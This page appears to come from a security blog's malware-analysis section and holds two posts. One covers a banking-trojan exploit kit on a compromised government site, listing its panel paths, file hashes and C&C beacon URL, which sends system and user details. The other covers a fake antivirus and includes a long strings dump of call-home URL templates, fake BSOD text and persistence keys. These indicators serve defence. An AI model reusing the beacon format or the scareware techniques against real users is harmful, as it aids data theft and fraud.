NoVirusThanks Blog » Malware Analysis

Karn!v0r3x v1.0 Exploit Kit

admin — Sat, 07 Jan 2012 21:49:28 +0000

There is a new exploit kit in the wild, this time named Karn!v0r3x v1.0:

Html code of the login page:



Karn!v0r3x v1.0 [Inicio]| Malandrines .n3t




	
		
		
			
 
				Username:
 
				
			
			
				Password: 

				
			
				
 
		
		
 
		
			Karn!v0r3x v1.0 | Malandrines .n3t [2011]

Sniffed traffic during trying some logins:

POST /imagenes_noticias/ HTTP/1.1
Host: alertas .gob.mx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.25) Gecko/20111212 Firefox/3.6.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: hxxp://www.alertas .gob.mx/imagenes_noticias/
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
 
user=username&pass=password

Screenshots of the content of some directories:

hxxp://www.alertas .gob.mx/imagenes_noticias/files/

hxxp://www.alertas .gob.mx/imagenes_noticias/files/os/

The file net4.exe looks like to be the legit file of .NET 4.0:

File: net4_exe
Size: 889416 bytes
MD5 Hash: 53406E9988306CBD4537677C5336ABA4
SHA1 Hash: 06BECADB92A5FCCA2529C0B93687C2A0C6D0D610
SHA256 Hash: FA1AFFF978325F8818CE3A559D67A58297D9154674DE7FD8EB03656D93104425
SHA384 Hash: FAA596D827BB04DAD53CFB921047BA07916BA78754EBDF00A5DF1BEE69594512DDD9E5F6F1C76D6B82EE3576E4CDA40F
SHA512 Hash: 4F89DA81B5A3800AA16FF33CC4A42DBB17D4C698A5E2983B88C32738DECB57E3088A1DA444AD0EC0D745C3C6B6B8B9B86D3F19909142F9E51F513748C0274A99

Location of the executable file is:

hxxp://www.alertas .gob.mx/imagenes_noticias/files/net4.exe

If we query the bot.php file as follow:

hxxp://www.alertas .gob.mx/imagenes_noticias/bot.php?b=sites

We get a list of websites (titles?) as seen in this image:

Most probably the banking trojan that is distributed with this exploit kit monitors for the page title of web browsers, and if matched the title it starts to capture details of banking transactions to steal the account details.

List of known paths related to this exploit kit:

/index.php
/bot.php?b=sites
/bot.php?b=save
/bot.php?b=show
/bot.php?b=id
/bot.php?b=savesites
/files/
/files/os/
/files/capturas/
/files/downloads/
/files/geoip.dat
/files/geoip.inc
/files/karni.jpg
/files/paises/
/files/net4.exe

The infected machine communicate with the C&C server as this:

/bot.php?b=save&windows=Microsoft%20Windows%20NT%205.1.2600%20Service%20Pack%203&pcname=PCNAME&userna=UserName

More details about this exploit kit can be found here:
Nuevo Botnet Contra Mexico: Karn!v0r3x

FakeAV: AntiVirus Studio 2010

admin — Mon, 04 Oct 2010 16:52:17 +0000

Another FakeAV, this time called AntiVirus Studio 2010. Like all FakeAV’s it claims to have found alot of infections in your computer and the only way to clean it is to pay a hefty price for a “license key”.

Here we have the main interface. As usual it starts the scan without any user interaction and displays a long list of so-called threats.

You are then prompted with a Buy Now window which again shows the list of “threats” on the computer. The list of “threats” is hardcoded into the binary and will never change from system to system.

If you click the Get License Key button the “Secure transaction browser” opens. Of course, this browser is not secure in any way.

I found this quiet amusing. Upon closing the main window you get this message box. (English clearly isn’t their first language)

This is a list of strings from the unpacked installer.

0x00073870    0x00000014    Win64.BIT.Looker.exe
0x00073890    0x000000AD    Win64.BIT.Looker software that puts high physical demand on hardware may damage it by excessive wear and tear. This worm can be 
0x00073940    0x00000011    Screen.Grab.J.exe
0x00073960    0x000000AD    Screen.Grab.J is a Trojan program that records keys and license info, stealing personal financial information. This worm can be 
0x00073A10    0x0000000C    Sft.dez.Wien
0x00073A28    0x000000CA    Sft.dez.Wien is a virus attempts to spread itself by attaching to a host program, and can damage hardware, software or data in t
0x00073AF4    0x0000000A    CAlert2Dlg
0x00073B00    0x00000008    SYSCLOSE
0x00073B0C    0x00000006    Tahoma
0x00073B14    0x00000006    Tahoma
0x00073B1C    0x00000006    Tahoma
0x00073B24    0x00000007    Warning
0x00073B2C    0x00000035    Are you sure you want to leave this software working?
0x00073B64    0x00000007    Warning
0x00073B70    0x00000158    Are you wish to keep this software on your computer ? This can lead to private data steal such as passwords, and credit cards by
0x00073F00    0x0000000F    Security Center
0x00073F10    0x00000005    ALERT
0x00073F18    0x00000010    firewall
0x00073F2C    0x0000000C    ignore
0x00073F3C    0x00000022    Keep this remote connection alive?
0x00074108    0x00000008    CBrowser
0x000742B5    0x00000009    s (%s:%d)
0x000742D0    0x0000001E    Exception thrown in destructor
0x000742F0    0x0000004A    C:\Program Files\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
0x0007434C    0x00000008    CEulaDlg
0x00074358    0x00000013    AntiVirus Tech Ltd.
0x0007436C    0x00000014    {CompanyNamePutHere}
0x00074384    0x00000013    AntiVirus Tech Ltd.
0x00074398    0x00000014    {COMPANYNAMEPUTHERE}
0x000743B0    0x00000015    AntiVirus Studio 2010
0x000743C8    0x00000015    {SoftwareNamePutHere}
0x000743E0    0x00000015    AntiVirus Studio 2010
0x000743F8    0x00000015    {SOFTWARENAMEPUTHERE}
0x000745D8    0x00000009    CFakeBSOD
0x000745E8    0x0000004D    -A problem has been detected and Windows has been shut down to prevent damage
0x00074638    0x00000012    -to your computer.
0x00074650    0x0000004A    *The problem seems to have been caused by the following file: SPRMTROY.SYS
0x0007469C    0x00000015    *CRITICAL_VIRUS_ERROR
0x000746B4    0x0000003E    *Your computer will be rebooted. All unsaved data will be lost
0x000746F4    0x0000001F     Possibly stolen security data:
0x00074714    0x00000018     - Possible credit cards
0x00074730    0x0000000C     - Passwords
0x00074740    0x00000011     - Email accounts
0x00074758    0x00000047    *Dll base DataStmp  - Name                    Dll base DataStmp  - Name
0x000747A0    0x0000004E     FAC8A000  FAC8AC09 - Exploit-PDF.w           ACC8A000  ACC8AC09 - NTRootKit-H
0x000747F0    0x00000051     CA78C000  CA78C8D0 - W32/Renocide.c          BA78C000  CAB8C8D0 - W32/Renocide.c
0x00074848    0x0000004F     AC592000  AC592045 - Keygen-Nero.a           ACB92000  AC592A45 - BackDoor-EFQ
0x00074898    0x00000051     7A76A000  7A76A12A - Generic HTool.b         7A76A000  7A76B12A - Downloader-BRW
0x000748F0    0x0000004F     1AC7A000  1AC7AC09 - W32/Rimecud             1AB7A000  1ACBAC09 - RealAlert-EA
0x00074940    0x00000053     6A49C000  6A49C8DA - RealAlert-DZ            6A49C000  6A49C8DA - W32/Autorun.worm
0x00074998    0x00000054     FC552000  FC552045 - W32/Spybot.worm.gen     FCB52000  FCB5B045 - Generic Dropper.x
0x000749F0    0x00000050     CA06A000  CA06A12A - W32/Koobface.worm.gen.h CC06A000  CC06A12A - Keygen-Nero.a
0x00074A44    0x0000003E    *If this is the first time you've seen this Stop error screen,
0x00074A84    0x00000028    -press any key to restart your computer.
0x00074AB0    0x00000017    *Technical Information:
0x00074AC8    0x00000043    **** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)
0x00074B10    0x00000049    **** SPRMTROY.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
0x00074B5C    0x0000000B    Courier New
0x00074DD0    0x0000000B    ForceRemove
0x00074DE0    0x00000008    NoRemove
0x00074DF0    0x00000006    Delete
0x00074DFC    0x00000005    AppID
0x00074E04    0x00000005    CLSID
0x00074E0C    0x00000014    Component Categories
0x00074E24    0x00000008    FileType
0x00074E30    0x00000009    Interface
0x00074E3C    0x00000008    Hardware
0x00074E54    0x00000008    SECURITY
0x00074E60    0x00000006    SYSTEM
0x00074E68    0x00000008    Software
0x00074E74    0x00000007    TypeLib
0x00074E7C    0x0000000B    CHtmlDialog
0x00074E88    0x00000030    res://%hs/%hs/index.html
0x00075118    0x00000007    /ea.php
0x00075120    0x00000016    http://%s%s?p=1&aid=%s
0x00075138    0x00000007    /ea.php
0x00075140    0x00000016    http://%s%s?p=6&aid=%s
0x00075158    0x00000010    SeDebugPrivilege
0x0007516C    0x00000006    wscsvc
0x00075174    0x0000000C    SharedAccess
0x00075184    0x00000008    wuauserv
0x00075190    0x00000006    MpsSvc
0x00075198    0x0000000E    ivwqerohlh0fpo
0x000751A8    0x0000001A    bpwjxlswvtvxekrptj32410fpo
0x000751C4    0x0000000F    ivwqtvsgsp|1dqp
0x000751D4    0x00000025    Startup installer [%s], username [%s]
0x000751FC    0x00000005    /AID=
0x00075204    0x00000019    Reading AID from registry
0x00075228    0x00000009    BagNumber
0x00075234    0x00000020    Software\Microsoft\Windows\Shell
0x00075258    0x00000009    BagNumber
0x00075264    0x00000020    Software\Microsoft\Windows\Shell
0x00075288    0x0000000A    AID = [%s]
0x00075294    0x0000000A    /UNINSTALL
0x000752A0    0x0000000C    Auto-install
0x000752B0    0x0000000F    Install success
0x000752C0    0x0000000E    Install failed
0x000752D0    0x00000040    46EE38D925C2E49C79D2314B3380316026A18FFD6B8869420970254B581026FE
0x00075314    0x0000001C    Run install/uninstall thread
0x00075334    0x00000011    Uninstall success
0x00075348    0x00000010    Uninstall failed
0x0007535C    0x0000000E    Fake uninstall
0x0007536C    0x0000000F    Install success
0x0007537C    0x0000000F    Install success
0x0007538C    0x0000000E    Install failed
0x0007539C    0x0000000B    Thread done
0x000753A8    0x00000011    Microsoft Windows
0x000753C0    0x00000055    You should get a license for your antivirus software. Click here to get it instantly.
0x00075418    0x00000011    Microsoft Windows
0x00075430    0x0000017D    Base setup of Microsoft Windows (r) Operating System do not contain antivirus and antispyware software. In order to protect your
0x000756A8    0x00000006    Tahoma
0x000756B0    0x00000015    AntiVirus Studio 2010
0x0007570B    0x0000002D    By installing this software you are agree to 
0x0007573C    0x00000006    Tahoma
0x00075744    0x00000011    license and terms
0x00075758    0x00000015    AntiVirus Studio 2010
0x00075796    0x00000031    Press Yes to exit or No to continue installation.
0x000757C8    0x00000015    AntiVirus Studio 2010
0x000759C8    0x00000008    CMainDlg
0x000759D4    0x0000000C    System Error
0x000759E4    0x00000020    42FAF9222ABD3D7F564AEDBE0D2924F2
0x00075A08    0x00000020    42FAF9222ABD3D7F564AEDBE0D2924F2
0x00075A2C    0x00000020    42FAF9222ABD3D7F564AEDBE0D2924F2
0x00075A50    0x00000020    42FAF9222ABD3D7F564AEDBE0D2924F2
0x00075A74    0x00000012    securitycenter.exe
0x00075A88    0x00000019    AntiVirus Studio 2010.exe
0x00075AA4    0x00000008    ac7d.exe
0x00075AB0    0x00000012    securityhelper.exe
0x00075AC4    0x0000000C    rundll32.exe
0x00075AD4    0x00000007    cmd.exe
0x00075ADC    0x0000000C    explorer.exe
0x00075AEC    0x0000000C    iexplore.exe
0x00075AFC    0x00000009    dwwin.exe
0x00075B08    0x0000000B    dllhost.exe
0x00075B18    0x00000100    Program %s is infected with virus %s. Continue running this program may be dangerous to your computer and personal data. Running
0x00075C1C    0x00000011    Microsoft Windows
0x00075E08    0x00000013    map/set too long
0x00075E29    0x0000001A    nvalid map/set iterator
0x00075E5D    0x0000000A    MessageBox
0x00076200    0x00000012    vector too long
0x00076360    0x0000000C    CProgressDlg
0x00076374    0x00000006    Tahoma
0x00076380    0x00000056    The AntiVirus Studio 2010 uninstallation will be finished in few minutes. Please wait.
0x000763D8    0x00000015    AntiVirus Studio 2010
0x000765E8    0x0000002D    /httpss/setup.php?v=%s&action=%s&mk=%s&aid=%s
0x00076618    0x00000007    http://
0x00076620    0x00000015    AntiVirus Studio 2010
0x00076638    0x00000005    %s\%s
0x00076640    0x00000014    software path = [%s]
0x00076658    0x00000019    AntiVirus Studio 2010.exe
0x00076674    0x00000005    %s\%s
0x0007667C    0x00000013    software exe = [%s]
0x00076690    0x00000012    securityhelper.exe
0x000766A4    0x00000005    %s\%s
0x000766AC    0x00000016    uninstaller exe = [%s]
0x000766C4    0x0000001E    Software\AntiVirus Studio 2010
0x000766E4    0x00000011    reg subkey = [%s]
0x000766F8    0x00000026    {3217DABC-8ACF-757B-9E6E-6F00DC89ACEB}
0x00076720    0x00000026    {FBD69E67-C708-47be-B49F-33D4200B810D}
0x00076748    0x00000015    AntiVirus Studio 2010
0x00076760    0x00000015    AntiVirus Studio 2010
0x00076778    0x00000005    %s\%s
0x00076780    0x00000015    AntiVirus Studio 2010
0x00076798    0x00000009    %s\%s.lnk
0x000767A4    0x00000015    AntiVirus Studio 2010
0x000767BC    0x00000032    %s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
0x000767F0    0x00000015    AntiVirus Studio 2010
0x00076808    0x00000015    %s\%s License Key.lnk
0x00076820    0x00000015    AntiVirus Studio 2010
0x00076838    0x0000002D    Software\Microsoft\Windows\CurrentVersion\Run
0x00076868    0x0000000E    SecurityCenter
0x00076878    0x0000002D    Software\Microsoft\Windows\CurrentVersion\Run
0x000768A8    0x00000049    Software\Microsoft\Windows\CurrentVersion\Uninstall\AntiVirus Studio 2010
0x000768F4    0x00000020    2B0FD0C0AB089E52B0DC65596784EC45
0x00076918    0x00000026    {3217DABC-8ACF-757B-9E6E-6F00DC89ACEB}
0x00076940    0x00000020    52CFF1136AE99C08D55D96DEBBCB08C4
0x00076964    0x00000019    AntiVirus Studio 2010.exe
0x00076980    0x00000012    securitycenter.exe
0x00076994    0x00000008    ac7d.exe
0x000769A0    0x00000013    distrib file = [%s]
0x000769B4    0x00000011    distrib extracted
0x000769C8    0x00000016    [%s] installed to [%s]
0x000769E0    0x00000024    [%s] copied to [%s] with result [%d]
0x00076A08    0x0000001E    http://www.%%s/buy/index/%s/%s
0x00076A28    0x0000000E    buy url = [%s]
0x00076A38    0x00000006    BuyUrl
0x00076A40    0x0000000D    "%s" /STARTUP
0x00076A50    0x00000015    AntiVirus Studio 2010
0x00076A68    0x0000002D    Software\Microsoft\Windows\CurrentVersion\Run
0x00076A98    0x00000005    ADVid
0x00076AA0    0x0000000A    InstallDir
0x00076AAC    0x00000015    AntiVirus Studio 2010
0x00076AC4    0x00000006    SoftID
0x00076ACC    0x00000013    ScanSystemOnStartup
0x00076AE0    0x00000014    AutomaticallyUpdates
0x00076AF8    0x0000000F    MinimizeOnStart
0x00076B08    0x0000000E    BackgroundScan
0x00076B18    0x00000015    BackgroundScanTimeout
0x00076B30    0x00000015    AntiVirus Studio 2010
0x00076B48    0x0000000B    DisplayName
0x00076B58    0x00000049    Software\Microsoft\Windows\CurrentVersion\Uninstall\AntiVirus Studio 2010
0x00076BA4    0x0000000F    "%s" /UNINSTALL
0x00076BB4    0x0000000F    UninstallString
0x00076BC8    0x00000049    Software\Microsoft\Windows\CurrentVersion\Uninstall\AntiVirus Studio 2010
0x00076C14    0x00000006    "%s",1
0x00076C1C    0x0000000B    DisplayIcon
0x00076C28    0x00000049    Software\Microsoft\Windows\CurrentVersion\Uninstall\AntiVirus Studio 2010
0x00076C74    0x00000015    AntiVirus Studio 2010
0x00076C8C    0x00000005    %s\%s
0x00076C94    0x00000015    AntiVirus Studio 2010
0x00076CAC    0x00000009    %s\%s.lnk
0x00076CB8    0x00000015    AntiVirus Studio 2010
0x00076CD0    0x00000009    %s\%s.lnk
0x00076CDC    0x00000015    AntiVirus Studio 2010
0x00076CF4    0x00000012    %s\Activate %s.lnk
0x00076D08    0x00000009    /REGISTER
0x00076D14    0x00000015    AntiVirus Studio 2010
0x00076D2C    0x00000019    %s\How to Activate %s.lnk
0x00076D48    0x0000000E    /registration/
0x00076D58    0x0000000B    http://www.
0x00076D64    0x0000000E    http://%s/help
0x00076D74    0x00000015    AntiVirus Studio 2010
0x00076D8C    0x0000000E    %s\Help %s.lnk
0x00076D9C    0x00000015    AntiVirus Studio 2010
0x00076DB4    0x00000032    %s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
0x00076DE8    0x0000001A    install complete, wait gui
0x00076E04    0x0000001A    gui done, execute software
0x00076E20    0x00000017    delete temp file = [%s]
0x00076E38    0x00000012    execute cmd = [%s]
0x00076E4C    0x00000016    create process success
0x00076E64    0x00000024    create process failed with code [%d]
0x00076E8C    0x00000006    gle=%d
0x00076E94    0x00000017    extract distrib to [%s]
0x00076EAC    0x0000002B    create file success, write file return [%d]
0x00076ED8    0x00000021    create file failed with code [%d]
0x00076EFC    0x00000006    gle=%d
0x00076F04    0x0000001C    install distrib [%s] to [%s]
0x00076F24    0x00000005    13:48
0x00076F2C    0x00000015    "%s" -p"%s" -y -o"%s"
0x00076F44    0x00000011    command line [%s]
0x00076F58    0x00000016    create process success
0x00076F70    0x00000008    output {
0x00076F7C    0x00000008    } output
0x00076F88    0x00000024    create process failed with code [%d]
0x00076FB0    0x00000006    gle=%d
0x00076FB8    0x00000021    create pipe failed with code [%d]
0x00076FDC    0x00000008    dir [%s]
0x00076FE8    0x00000013    cmd.exe /C dir "%s"
0x00076FFC    0x00000011    command line [%s]
0x00077010    0x00000016    create process success
0x00077028    0x00000008    output {
0x00077034    0x00000008    } output
0x00077040    0x00000024    create process failed with code [%d]
0x00077068    0x00000006    gle=%d
0x00077070    0x00000021    create pipe failed with code [%d]
0x00077094    0x00000010    Invalid DateTime
0x000770A8    0x00000014    Invalid DateTimeSpan
0x000770C0    0x0000000E    bad allocation
0x000770D0    0x0000000A    CUninstDlg
0x000770DC    0x00000017    /uninstall.php?machine=
0x000770F4    0x00000007    http://
0x000770FC    0x0000000B    Hello world
0x00077108    0x0000000C    explorer.exe
0x00077120    0x00000015    AntiVirus Studio 2010
0x00077138    0x00000042    Uninstall key is correct. Are you sure want to continue uninstall?
0x0007717C    0x00000015    AntiVirus Studio 2010
0x00077194    0x0000001A    Unistall key is incorrect.
0x000771B0    0x00000015    AntiVirus Studio 2010
0x00077EF8    0x00000010    IDR_SKIN_%02X_%s
0x00077F0C    0x00000012    IDR_SKIN_%02X_%08X
0x00077F28    0x00000014    IDR_SKIN_%02X_%s_RGN
0x00077F40    0x00000016    IDR_SKIN_%02X_%08X_RGN
0x00077F60    0x00000015    IDR_SKIN_%02X_%s_%02X
0x00077F78    0x00000017    IDR_SKIN_%02X_%08X_%02X
0x000782DE    0x00000011    Y@SkinButtonGroup
0x000782F0    0x0000000F    SkinButtonGroup
0x00078300    0x0000000F    SkinButtonGroup
0x00078310    0x0000000F    SkinButtonGroup
0x000784A0    0x0000000F    RegEdit_RegEdit
0x000784B8    0x0000000B    Regedit.exe
0x000784C4    0x0000000F    RegEdit_RegEdit
0x000784D4    0x00000011    HKEY_CLASSES_ROOT
0x000784E8    0x00000011    HKEY_CURRENT_USER
0x000784FC    0x00000012    HKEY_LOCAL_MACHINE
0x00078510    0x0000000A    HKEY_USERS
0x0007851C    0x00000015    HKEY_PERFORMANCE_DATA
0x00078534    0x00000013    HKEY_CURRENT_CONFIG
0x00078548    0x0000000D    HKEY_DYN_DATA
0x00078558    0x00000006    HKEY_C
0x00078560    0x00000007    HKEY_CU
0x00078568    0x00000006    HKEY_L
0x00078570    0x00000006    HKEY_U
0x00078578    0x00000006    HKEY_P
0x00078580    0x0000000E    HKEY_CURRENT_C
0x00078590    0x00000006    HKEY_D
0x00078598    0x0000000D    SysTreeView32
0x000785A8    0x0000000D    SysListView32
0x000785B8    0x00000005    logs.
0x000785C0    0x00000005    %u.%s
0x000785C8    0x0000000D    httpsquer.com
0x000785E8    0x00000005    logs.
0x00078691    0x0000000C    ad json_cast
0x000786C1    0x00000013    os_base::eofbit set
0x000786D8    0x00000015    ios_base::failbit set
0x000786F0    0x00000014    ios_base::badbit set
0x00078715    0x00000007    ad cast
0x0007875E    0x0000001A    Akernel32.dIl
0x0007877C    0x0000000C    kernel32.dIl
0x00078798    0x0000000D    Shell_TrayWnd
0x000787A8    0x0000000F    S:(ML;;NW;;;LW)
0x000787B8    0x0000001E    Software\AntiVirus Studio 2010
0x000787DC    0x0000000E    bad allocation
0x000787EC    0x00000006    Trojan
0x000787F4    0x00000005    Virus
0x00078804    0x0000000D    Keygen-Nero.a
0x00078814    0x00000009    rtfme.exe
0x00078820    0x0000001F    TrojanDownloader:Win32/Renos.KO
0x00078840    0x00000009    17dkf.exe
0x0007884C    0x00000018    Adware:Win32/Wheresphere
0x00078868    0x0000000B    qwedvor.exe
0x00078874    0x00000022    TrojanDownloader:Win32/Bredolab.AB
0x00078898    0x0000000D    winlogoff.exe
0x000788A8    0x0000001D    TrojanDownloader:BAT/Lnkget.X
0x000788C8    0x0000000A    format.exe
0x000788D4    0x00000019    Trojan:Win32/Hiloti.gen!D
0x000788F0    0x00000008    test.exe
0x000788FC    0x00000017    Trojan:Win32/Cryptrun.B
0x00078914    0x0000000D    destroyer.exe
0x00078924    0x00000017    Exploit:Win32/Pdfjsc.DE
0x0007893C    0x0000000A    dffuck.exe
0x00078948    0x0000001E    Backdoor:Win32/Poisonivy.gen!A
0x00078968    0x00000008    lols.exe
0x00078974    0x0000001F    TrojanDownloader:Win32/Renos.KN
0x00078994    0x0000000A    hodeme.exe
0x000789A0    0x00000017    Trojan:JS/Redirector.BQ
0x000789B8    0x00000009    cffd4.exe
0x000789C4    0x0000001A    Worm:Win32/Conficker.B!inf
0x000789E0    0x00000006    fe.exe
0x000789E8    0x0000001A    Worm:Win32/Autorun.gen!inf
0x00078A04    0x0000000A    poertd.exe
0x00078A10    0x00000017    Exploit:Win32/Pdfjsc.CR
0x00078A28    0x0000000E    protector2.exe
0x00078A38    0x00000017    Trojan:Win32/Alureon.CT
0x00078A50    0x00000008    safe.exe
0x00078A5C    0x00000019    TrojanDownloader:JS/Renos
0x00078A78    0x00000009    timem.exe
0x00078A84    0x00000016    Worm:Win32/Conficker.C
0x00078A9C    0x0000000A    hiphop.exe
0x00078AA8    0x00000015    Virus:Win32/Alureon.F
0x00078AC0    0x0000000A    2010yo.exe
0x00078ACC    0x00000015    Virus:Win32/Sality.AM
0x00078AE4    0x0000000B    rsrtd12.exe
0x00078AF0    0x00000016    Worm:Win32/Conficker.B
0x00078B08    0x0000000B    dkfjd93.exe
0x00078B14    0x0000001A    Exploit:HTML/IframeRef.gen
0x00078B30    0x0000000E    cocksucker.exe
0x00078B40    0x00000017    Trojan:Win32/Alureon.CT
0x00078B58    0x00000008    kock.exe
0x00078B64    0x00000014    Trojan:Win32/FakeXPA
0x00078B7C    0x0000000A    ploper.exe
0x00078B88    0x0000001F    TrojanDownloader:Win32/Renos.KG
0x00078BA8    0x0000000C    kjh102k3.exe
0x00078BB8    0x00000019    Trojan:Win32/Hiloti.gen!D
0x00078BD4    0x0000000C    hjkgfddd.exe
0x00078BE4    0x00000021    Adware:Win32/ZangoShoppingreports
0x00078C08    0x0000000A    wergfq.exe
0x00078C14    0x00000016    Adware:Win32/GameVance
0x00078C2C    0x00000009    lorsk.exe
0x00078C38    0x00000020    BrowserModifier:Win32/BaiduSobar
0x00078C5C    0x0000000A    cosock.exe
0x00078C68    0x00000013    Adware:Win32/Gibmed
0x00078C7C    0x0000000A    ddhelp.exe
0x00078C88    0x0000001F    TrojanDownloader:Win32/Renos.KF
0x00078CA8    0x00000009    wined.exe
0x00078CB4    0x00000013    Adware:Win32/Hotbar
0x00078CC8    0x00000009    brdss.exe
0x00078CD4    0x00000017    Worm:Win32/Taterf.gen!A
0x00078CEC    0x0000000A    hardwh.exe
0x00078CF8    0x00000016    PWS:Win32/Ceekat.gen!A
0x00078D10    0x0000000A    winifi.exe
0x00078D1C    0x00000016    Worm:Win32/Conficker.C
0x00078D34    0x00000009    rator.exe
0x00078D40    0x00000013    PWS:Win32/Lolyda.AU
0x00078D54    0x0000000A    snowif.exe
0x00078D60    0x00000014    Worm:Win32/Rimecud.A
0x00078D78    0x00000009    sycre.exe
0x00078D84    0x00000017    PWS:Win32/Frethog.gen!B
0x00078D9C    0x0000000A    altedf.exe
0x00078DA8    0x00000016    Worm:Win32/Conficker.B
0x00078DC0    0x00000008    dc_3.exe
0x00078DCC    0x00000014    Worm:Win32/Rimecud.B
0x00078DE4    0x0000000B    ljts-23.exe
0x00078DF0    0x00000013    Worm:Win32/Hamweq.A
0x00078E04    0x0000000A    d20mes.exe
0x00078E10    0x00000013    Worm:Win32/Taterf.B
0x00078E24    0x0000000A    dgxdro.exe
0x00078E30    0x00000011    Generic Dropper.x
0x00078E44    0x00000009    56493.exe
0x00078E50    0x00000019    W32/Autorun.worm!5492698F
0x00078E6C    0x0000000C    wrfwe_di.exe
0x00078E7C    0x0000000C    RealAlert-DI
0x00078E8C    0x0000000C    lkhgg_ea.exe
0x00078E9C    0x0000000C    RealAlert-EA
0x00078EAC    0x0000000D    8gmsed-bd.exe
0x00078EBC    0x00000015    BackDoor-DKA Internet
0x00078ED4    0x0000000B    bzqa43d.exe
0x00078EE0    0x00000010    Downloader-BQZ.a
0x00078EF4    0x0000000C    tryh-blv.exe
0x00078F04    0x0000000E    Downloader-BLV
0x00078F14    0x0000000A    puzpup.exe
0x00078F20    0x00000016    Generic Pup.z!7ec2eb2a
0x00078F38    0x0000000B    hvipws9.exe
0x00078F44    0x00000012    Generic PWS.y!hv.i
0x00078F58    0x0000000D    jdhellwo3.exe
0x00078F68    0x00000017    W32/Koobface.worm.gen.h
0x00078F80    0x0000000C    eelnvd13.exe
0x00078F90    0x0000001F    W32/Autorun.worm.gen.h!7ec2eb2a
0x00078FB0    0x0000000F    a75wef8e0e7.exe
0x00078FC0    0x00000019    W32/Autorun.worm!a758e0e7
0x00078FDC    0x00000012    kjdh_gf_jjdhgd.exe
0x00078FF0    0x0000000E    Downloader-BRW
0x00079000    0x00000011    02c9c3c35bdx5.exe
0x00079014    0x00000017    Generic.dx!02c9c3c35bd5
0x0007902C    0x00000011    ae0965a7157cd.exe
0x00079040    0x00000017    Generic.dx!ae0965a7157c
0x00079058    0x00000011    472a10e2ebxd9.exe
0x0007906C    0x00000017    Generic.dx!472a10e2ebd9
0x00079084    0x0000000C    jkfuckfu.exe
0x00079094    0x00000012    Generic Dropper.js
0x000790A8    0x0000000E    aqfitrlxi2.exe
0x000790B8    0x0000000C    BackDoor-EFQ
0x000790C8    0x0000000E    ppddfcfux.exxe
0x000790D8    0x0000000D    Exploit-PDF.w
0x000790E8    0x0000000D    ddoll3342.exe
0x000790F8    0x0000000E    Downloader-BVW
0x00079108    0x0000000C    1iowieoo.exe
0x00079118    0x0000000E    W32/Renocide.c
0x00079128    0x0000000A    r0life.exe
0x00079134    0x0000000B    NTRootKit-H
0x00079140    0x0000000B    cunifuc.exe
0x0007914C    0x0000000F    W32/Rimecud!mem
0x0007915C    0x0000000C    kilslmd.exex
0x0007916C    0x0000000B    W32/Rimecud
0x00079178    0x0000000B    wdo9rm.exxe
0x00079184    0x00000014    W32/Autorun.worm.zzp
0x0007919C    0x0000000B    jofcdks.exe
0x000791A8    0x00000018    Pigax.gen.a!921565b7f057
0x000791C4    0x0000000B    dd10x10.exe
0x000791D0    0x0000001E    Generic PWS.y!bbg!06085157775A
0x000791F0    0x0000000D    hhbboll_2.exe
0x00079200    0x0000000F    Generic HTool.b
0x00079210    0x00000007    kgn.exe
0x00079218    0x0000000D    Keygen-Nero.a
0x00079228    0x0000000B    pswwg3c.exe
0x00079234    0x00000020    W32/Spybot.worm.gen!3c0e7eeb37a6
0x00079258    0x0000000A    htfad4.exe
0x00079264    0x00000019    RealAlert-HT!b3fe79005ad4
0x00079280    0x0000000A    cowceb.exe
0x0007928C    0x00000021    Generic Malware.co!a!ceb81c269a44
0x000792B0    0x0000000D    wwwsssgen.exe
0x000792C0    0x0000001B    W32/Sality.gen!ac1c3c308a6e
0x000792DC    0x00000009    ds7hw.exe
0x000792E8    0x0000001C    Generic Proxy!m!ad27925df1a5
0x00079308    0x0000000D    alerfa322.exe
0x00079318    0x00000019    RealAlert-DZ!79900a049ee8
0x00079334    0x0000000B    aler3fa.exe
0x00079340    0x00000019    RealAlert-DZ!0b0bf33cbf1e
0x0007935C    0x0000000C    al3erfa3.exe
0x0007936C    0x00000019    RealAlert-DZ!1b92f70bb87c
0x00079388    0x0000000B    alerfa2.exe
0x00079394    0x00000019    LealAlert-DZ!8299f5588bd6
0x000793B0    0x0000000A    alerfa.exe
0x000793BC    0x00000019    RealAlert-DZ!4f19c3b42195
0x000793D8    0x00000010    qwklrvjhqlkj.exe
0x000793EC    0x0000001B    Generic.dx!fia!71e64790169d
0x00079408    0x0000000E    ggwwef9752.exe
0x00079418    0x0000001B    Generic.dx!fia!b77c402ecd7c
0x00079434    0x0000000A    fadz43.exe
0x00079440    0x00000019    RealAlert-DZ!97f406ad794a
0x0007945C    0x0000000C    eephilpe.exe
0x0007946C    0x0000000E    W32/PhilPedo.a
0x0007947C    0x0000000C    wwautrsd.exe
0x0007948C    0x00000019    W32/Autorun.worm!5492698F
0x000794A8    0x0000000B    dwl_bqz.exe
0x000794B4    0x00000010    Downloader-BQZ.a
0x000794C8    0x0000000B    gpupz2a.exe
0x000794D4    0x00000016    Generic Pup.z!7ec2eb2a
0x000794EC    0x0000000C    wqefqw7e.exe
0x000794FC    0x0000001F    W32/Autorun.worm.gen.h!7ec2eb2a
0x0007951C    0x0000000D    warsddd_w.exe
0x0007952C    0x00000019    W32/Autorun.worm!a758e0e7
0x00079548    0x0000000E    wefgetn_00.exe
0x00079558    0x00000017    Generic.dx!02c9c3c35bd5
0x00079570    0x0000000D    gedx_ae09.exe
0x00079580    0x00000017    Generic.dx!ae0965a7157c
0x00079598    0x0000000B    wrcud12.exe
0x000795A4    0x0000000B    W32/Rimecud
0x000795B0    0x0000000B    g_dx234.exe
0x000795BC    0x00000017    Generic.dx!472a10e2ebd9
0x000795D4    0x0000000E    w32-reno-c.exe
0x000795E4    0x0000000E    W32/Renocide.c
0x000795F4    0x0000000C    exppdf_w.exe
0x00079604    0x0000000D    Exploit-PDF.w
0x00079614    0x0000000D    backd-efq.exe
